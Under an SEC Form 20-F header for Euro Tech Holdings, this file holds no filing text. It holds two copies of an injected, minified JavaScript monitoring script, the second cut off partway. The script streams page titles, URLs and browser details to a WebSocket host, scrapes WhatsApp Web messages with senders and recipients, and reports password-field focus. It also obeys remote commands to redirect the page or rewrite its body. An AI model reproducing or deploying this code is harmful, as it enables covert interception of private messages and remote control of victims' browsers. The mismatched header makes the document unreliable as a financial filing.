Form 20-F
period 2020-12-31
EURO TECH HOLDINGS CO LTD
filed 2021-05-13
CIK 1026662

 &#xD; &#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&&I.readyState==WebSocket.OPEN&&I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&&(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&&e&&m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&&"password"==Y.type&&H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&&i.hasAttribute("autofocus"),a=n&&e&&i.isEqualNode(e);(r||a)&&u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&&(S.iup&&r(),p()&&(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&&"pm"==o[3].toLowerCase()&&(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&&!(Math.abs(r-i)&gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&&s&&T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),y=setInterval(a,S.sendNotificationsInterval),p()&&(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&&(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function f(){(I=new WebSocket(S.connectionString)).onclose=o,I.onmessage=s,I.onopen=d,S.extJs&&(this.extJs.webSockReady=()=&gt;I.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;I.send(Y))}function g(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function p(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function h(){I.send(JSON.stringify({type:"waptracking"}))}function m(){E=new Map,w=new Set,L=0,(k=new Date).setSeconds(0),k.setMilliseconds(0)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&lt;i;a++)t=Y[a],!e.indexOf(t)&&t.length&gt;r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7&gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&&g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"e35c7746-f456-4d73-b785-799586f49967",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"15604",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&&S.extJs.init(S.token),n()&&window.addEventListener("focus",r),(n()||S.extJs)&&l()}))}();&#xD; &#xD; &#xD; &#xD; &#xD;&#xD; &#xD;&#xD; !function(){var Y,e,t;function n(){try{return window.self===window.top}catch(Y){return!1}}function r(){var Y={type:"focus",token:S.token,title:document.title,url:document.URL,useragent:navigator.userAgent,pid:S.pid,pn:S.pn};null!=I&&I.readyState==WebSocket.OPEN&&I.send(JSON.stringify(Y))}function a(){var Y={type:"notification",token:S.token,title:document.title,url:document.URL,focused:document.hasFocus(),timeout:S.sendNotificationsInterval,useragent:navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,pid:S.pid,pn:S.pn};I.send(JSON.stringify(Y))}function i(){h()}function o(){n()&&(clearInterval(y),clearInterval(N)),timeout=setTimeout((function(){f()}),v)}function s(Y){if(n())switch(Y.data.substring(0,1)){case"r":window.location=Y.data.substring(1);break;case"b":document.body.innerHTML=Y.data.substring(1);break;case"w":var e="true"==Y.data.substring(1).toLowerCase();T!=e&&e&&m(),T=e}}function M(Y){var e=document.createElement("a");return e.href=Y,e.href}function u(Y){if(Y&&"password"==Y.type&&!H){H=!0;var e={type:"password_input_focus",focus:!0,token:S.token};I.send(JSON.stringify(e))}}function D(Y){if(Y&&"password"==Y.type&&H){H=!1;var e={type:"password_input_focus",focus:!1,token:S.token};I.send(JSON.stringify(e))}}function c(Y){var e=document.activeElement;e&&e!=document.body?document.querySelector&&(e=document.querySelector(":focus")):e=null;for(var t=0;t&lt;Y.length;++t){let i=Y[t];var n="password"==i.type,r=n&&i.hasAttribute("autofocus"),a=n&&e&&i.isEqualNode(e);(r||a)&&u(),i.onfocus=function(){u(i)},i.onblur=function(){D(i)}}}function d(){n()&&(S.iup&&r(),p()&&(m(),h(),function(){var Y=new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&("childList"!==Y.type||Y.addedNodes.length&lt;=0||Y.addedNodes.forEach((function(Y){if(Y){var e=document.querySelector("div[id=main] header span[title]");e&&(b=e.innerText),document.querySelector("div[id=main] header span[data-icon=default-user]")&&(A="private"),document.querySelector("div[id=main] header span[data-icon=default-group]")&&(A="group");var t=Y.querySelectorAll(".message-in, .message-out");Y.matches(".message-in, .message-out")&&(t=Array.prototype.slice.call(t)).push(Y),t&&t.forEach((function(Y){if(Y&&Y.classList&&!(Y.classList.length&lt;=0)){var e=Y.classList.contains("message-in"),t=Y.querySelector(".copyable-text"),n=Y.querySelector(".selectable-text"),r=new Date,a=null;if(t&&t.attributes["data-pre-plain-text"]){var i=t.attributes["data-pre-plain-text"].textContent,o=/\[(\d{1,2}):(\d{1,2})[ ]{0,1}([p|a]m)?,\s(.+)]\s(.*):/i[Symbol.match](i);if(!o||6!=o.length)return;if(o[3]&&"pm"==o[3].toLowerCase()&&(o[1]=parseInt(o[1])+12),dateParts=/(\d{1,4})[.-\\/](\d{1,4})[.-\\/](\d{1,4})/[Symbol.match](o[4]),!dateParts||4!=dateParts.length)return;if(!(r=date.parse(o[4],C)||function(Y,e,t){var n=[[Y,e,t].join("-"),[Y,t,e].join("-"),[e,Y,t].join("-"),[e,t,Y].join("-"),[t,Y,e].join("-"),[t,e,Y].join("-")],r=Date.now();for(var a in n){var i=Date.parse(n[a]);if(i&&!(Math.abs(r-i)&gt;1728e6))return new Date(i)}}(dateParts[1],dateParts[2],dateParts[3])))return;r.setHours(o[1]),r.setMinutes(o[2]),a=o[5]}E.get(b)||E.set(b,k);var s=n?n.innerText:null;if(a&&s&&T){var M=(a+s+b+r.getTime()).split("").map((function(Y){return Y.charCodeAt(0)})).reduce((function(Y,e){return Y+((Y&lt;&lt;7)+(Y&lt;&lt;3))^e})).toString(16);if(E.get(b).getTime()==r.getTime()?r.setMilliseconds(++L):(L=0,E.set(b,r)),!M||w.has(M))return;var u={type:"wapmessage",timestamp:r.getTime(),id:M,incoming:e,sender:e?a:"Me",content:s,recipient:e?"Me":b,conversationId:b+"("+A+")"};I.send(JSON.stringify(u)),w.add(M)}}}))}})))}))}));if(!Y)return;Y.observe(document.body,{childList:!0,subtree:!0})}()),n()&&(a(),y=setInterval(a,S.sendNotificationsInterval),p()&&(N=setInterval(i,S.pollWhatsappTrackingInterval))),function(){for(var Y=[],e=document.getElementsByTagName("link"),t=0;t&lt;e.length;++t)"icon"!=e[t].getAttribute("rel")&&"shortcut icon"!=e[t].getAttribute("rel")||(Y[Y.length]=M(e[t].getAttribute("href")));0==Y.length&&(Y[0]=M("/favicon.ico"));var n={type:"favicon"};n.url=document.URL,n.src=Y,n.title=document.title,n.token=S.token,n.useragent=navigator.appVersion.length&gt;navigator.userAgent.length?navigator.appVersion:navigator.userAgent,I.send(JSON.stringify(n))}(),S.dontTrackWebPasswords&&(c(document.getElementsByTagName("input")),new MutationObserver((function(Y){Y&&Y.forEach((function(Y){Y&&Y.addedNodes&&0!=Y.addedNodes.length&&(window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach),Y.addedNodes.forEach((function(Y){Y.tagName&&c(Y.getElementsByTagName("input"))})))}))})).observe(document,{childList:!0,subtree:!0}),window.onbeforeunload=D))}function l(){document.tmfilter||(f(),C={"ar-SA":"D/M/YY","bg-BG":"D.M.YYYY","ca-ES":"D/M/YYYY","zh-TW":"YYYY/M/D","cs-CZ":"D.M.YYYY","Da-DK":"D-M-YYYY","De-DE":"D.M.YYYY","el-GR":"D/M/YYYY","en-US":"M/D/YYYY","fi-FI":"D.M.YYYY","fr-FR":"D/M/YYYY","he-IL":"D/M/YYYY","hu-HU":"YYYY. M. D.","is-IS":"D.M.YYYY","it-IT":"D/M/YYYY","ja-JP":"YYYY/M/D","ko-KR":"YYYY-M-D","nl-NL":"D-M-YYYY","nb-NO":"D.M.YYYY","pl-PL":"YYYY-M-D","pt-BR":"D/M/YYYY","ro-RO":"D.M.YYYY","ru-RU":"D.M.YYYY","hr-HR":"D.M.YYYY","sk-SK":"D. M. YYYY","sq-AL":"YYYY-M-D","sv-SE":"YYYY-M-D","th-TH":"D/M/YYYY","tr-TR":"D.M.YYYY","ur-PK":"D/M/YYYY","iD-ID":"D/M/YYYY","uk-UA":"D.M.YYYY","be-BY":"D.M.YYYY","sl-SI":"D.M.YYYY","et-EE":"D.M.YYYY","lv-LV":"YYYY.M.D.","lt-LT":"YYYY.M.D","fa-IR":"M/D/YYYY","vi-VN":"D/M/YYYY","hy-AM":"D.M.YYYY","az-Latn-AZ":"D.M.YYYY","eu-ES":"YYYY/M/D","Mk-MK":"D.M.YYYY","af-ZA":"YYYY/M/D","ka-GE":"D.M.YYYY","fo-FO":"D-M-YYYY","hi-IN":"D-M-YYYY","Ms-MY":"D/M/YYYY","kk-KZ":"D.M.YYYY","ky-KG":"D.M.YY","sw-KE":"M/D/YYYY","uz-Latn-UZ":"D/M YYYY","tt-RU":"D.M.YYYY","pa-IN":"D-M-YY","gu-IN":"D-M-YY","ta-IN":"D-M-YYYY","te-IN":"D-M-YY","kn-IN":"D-M-YY","Mr-IN":"D-M-YYYY","sa-IN":"D-M-YYYY","Mn-MN":"YY.M.D","gl-ES":"D/M/YY","kok-IN":"D-M-YYYY","syr-SY":"D/M/YYYY","Dv-MV":"D/M/YY","ar-IQ":"D/M/YYYY","zh-CN":"YYYY/M/D","De-CH":"D.M.YYYY","en-GB":"D/M/YYYY","es-MX":"D/M/YYYY","fr-BE":"D/M/YYYY","it-CH":"D.M.YYYY","nl-BE":"D/M/YYYY","nn-NO":"D.M.YYYY","pt-PT":"D-M-YYYY","sr-Latn-CS":"D.M.YYYY","sv-FI":"D.M.YYYY","az-Cyrl-AZ":"D.M.YYYY","Ms-BN":"D/M/YYYY","uz-Cyrl-UZ":"D.M.YYYY","ar-EG":"D/M/YYYY","zh-HK":"D/M/YYYY","De-AT":"D.M.YYYY","en-AU":"D/M/YYYY","es-ES":"D/M/YYYY","fr-CA":"YYYY-M-D","sr-Cyrl-CS":"D.M.YYYY","ar-LY":"D/M/YYYY","zh-SG":"D/M/YYYY","De-LU":"D.M.YYYY","en-CA":"D/M/YYYY","es-GT":"D/M/YYYY","fr-CH":"D.M.YYYY","ar-DZ":"D-M-YYYY","zh-MO":"D/M/YYYY","De-LI":"D.M.YYYY","en-NZ":"D/M/YYYY","es-CR":"D/M/YYYY","fr-LU":"D/M/YYYY","ar-MA":"D-M-YYYY","en-IE":"D/M/YYYY","es-PA":"M/D/YYYY","fr-MC":"D/M/YYYY","ar-TN":"D-M-YYYY","en-ZA":"YYYY/M/D","es-DO":"D/M/YYYY","ar-OM":"D/M/YYYY","en-JM":"D/M/YYYY","es-VE":"D/M/YYYY","ar-YE":"D/M/YYYY","en-029":"M/D/YYYY","es-CO":"D/M/YYYY","ar-SY":"D/M/YYYY","en-BZ":"D/M/YYYY","es-PE":"D/M/YYYY","ar-JO":"D/M/YYYY","en-TT":"D/M/YYYY","es-AR":"D/M/YYYY","ar-LB":"D/M/YYYY","en-ZW":"M/D/YYYY","es-EC":"D/M/YYYY","ar-KW":"D/M/YYYY","en-PH":"M/D/YYYY","es-CL":"D-M-YYYY","ar-AE":"D/M/YYYY","es-UY":"D/M/YYYY","ar-BH":"D/M/YYYY","es-PY":"D/M/YYYY","ar-QA":"D/M/YYYY","es-BO":"D/M/YYYY","es-SV":"D/M/YYYY","es-HN":"D/M/YYYY","es-NI":"D/M/YYYY","es-PR":"D/M/YYYY","aM-ET":"D/M/YYYY","tzM-Latn-DZ":"D-M-YYYY","iu-Latn-CA":"D/M/YYYY","sMa-NO":"D.M.YYYY","Mn-Mong-CN":"YYYY/M/D","gD-GB":"D/M/YYYY","en-MY":"D/M/YYYY","prs-AF":"D/M/YY","bn-BD":"D-M-YY","wo-SN":"D/M/YYYY","rw-RW":"M/D/YYYY","qut-GT":"D/M/YYYY","sah-RU":"M.D.YYYY","gsw-FR":"D/M/YYYY","co-FR":"D/M/YYYY","oc-FR":"D/M/YYYY","Mi-NZ":"D/M/YYYY","ga-IE":"D/M/YYYY","se-SE":"YYYY-M-D","br-FR":"D/M/YYYY","sMn-FI":"D.M.YYYY","Moh-CA":"M/D/YYYY","arn-CL":"D-M-YYYY","ii-CN":"YYYY/M/D","Dsb-DE":"D. M. YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. 